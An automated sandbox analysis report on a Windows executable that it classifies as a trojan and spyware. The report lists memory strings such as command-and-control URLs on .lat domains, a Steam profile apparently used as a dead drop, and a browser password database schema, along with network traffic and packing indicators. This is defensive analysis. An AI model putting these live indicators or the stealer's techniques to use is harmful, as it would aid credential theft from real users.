Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/7656119972433190066U
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.ste
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steamp
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampow
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscri
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.comm
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sustainskelet.lat:443/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sweepyribs.lat:443/api%l
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcVcc
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: 0gnHF2twcT.exe, 00000000.00000003.1603777248.0000000005280000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49714 version: TLS 1.2

System Summary

barindex
Source: 0gnHF2twcT.exe Static PE information: section name:
Source: 0gnHF2twcT.exe Static PE information: section name: .idata
Source: 0gnHF2twcT.exe Static PE information: section name:
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A389B0 0_3_00A389B0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A389B0 0_3_00A389B0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A3DB28 0_3_00A3DB28
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A3DB28 0_3_00A3DB28
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A3DB28 0_3_00A3DB28
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A3DB28 0_3_00A3DB28
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A389B0 0_3_00A389B0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A389B0 0_3_00A389B0
Source: 0gnHF2twcT.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0gnHF2twcT.exe Static PE information: Section: ZLIB complexity 0.9973980629280822
Source: 0gnHF2twcT.exe Static PE information: Section: mimqpfga ZLIB complexity 0.9946124506039368
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 0gnHF2twcT.exe, 00000000.00000003.1557213361.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1557098653.0000000005201000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1578229101.000000000527C000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1578012510.00000000051EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0gnHF2twcT.exe ReversingLabs: Detection: 57%
Source: 0gnHF2twcT.exe Virustotal: Detection: 54%
Source: 0gnHF2twcT.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File read: C:\Users\user\Desktop\0gnHF2twcT.exe Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: 0gnHF2twcT.exe Static file information: File size 1881600 > 1048576
Source: 0gnHF2twcT.exe Static PE information: Raw size of mimqpfga is bigger than: 0x100000 < 0x1a3200

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Unpacked PE file: 0.2.0gnHF2twcT.exe.70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mimqpfga:EW;grnkiruz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mimqpfga:EW;grnkiruz:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 0gnHF2twcT.exe Static PE information: real checksum: 0x1cffc8 should be: 0x1ce053
Source: 0gnHF2twcT.exe Static PE information: section name:
Source: 0gnHF2twcT.exe Static PE information: section name: .idata
Source: 0gnHF2twcT.exe Static PE information: section name:
Source: 0gnHF2twcT.exe Static PE information: section name: mimqpfga
Source: 0gnHF2twcT.exe Static PE information: section name: grnkiruz
Source: 0gnHF2twcT.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A321CA push ecx; ret 0_3_00A324EA
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A321CA push ecx; ret 0_3_00A324EA
